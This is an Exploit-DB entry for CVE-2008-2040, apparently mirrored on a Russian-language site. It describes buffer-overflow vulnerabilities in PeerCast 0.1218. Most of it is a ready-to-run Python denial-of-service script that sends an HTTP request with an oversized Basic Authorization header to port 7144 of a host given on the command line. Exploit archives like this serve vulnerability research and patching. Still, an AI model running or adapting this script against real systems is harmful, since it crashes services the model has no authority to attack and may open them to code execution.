- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 31713
- Проверка EDB
-
- Пройдено
- Автор
- NICO GOLDE
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2008-2040
- Дата публикации
- 2008-04-29
Код:
source: https://www.securityfocus.com/bid/28986/info
PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
Successfully exploiting these issues will allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
These issues affect PeerCast 0.1218; other versions may also be affected.
#!/usr/bin/env python
import sys, socket
port = 7144
buff = 'GET /http/ HTTP/1.1\n'
buff+= 'Connection: close\n'
buff+= 'Accept: */*\n'
buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'
if(len(sys.argv) < 2):
print "ERR: please specify a hostname"
sys.exit(-1)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], port))
s.send(buff);
except:
print "ERR: socket()"
sys.exit(-1)- Источник
- www.exploit-db.com
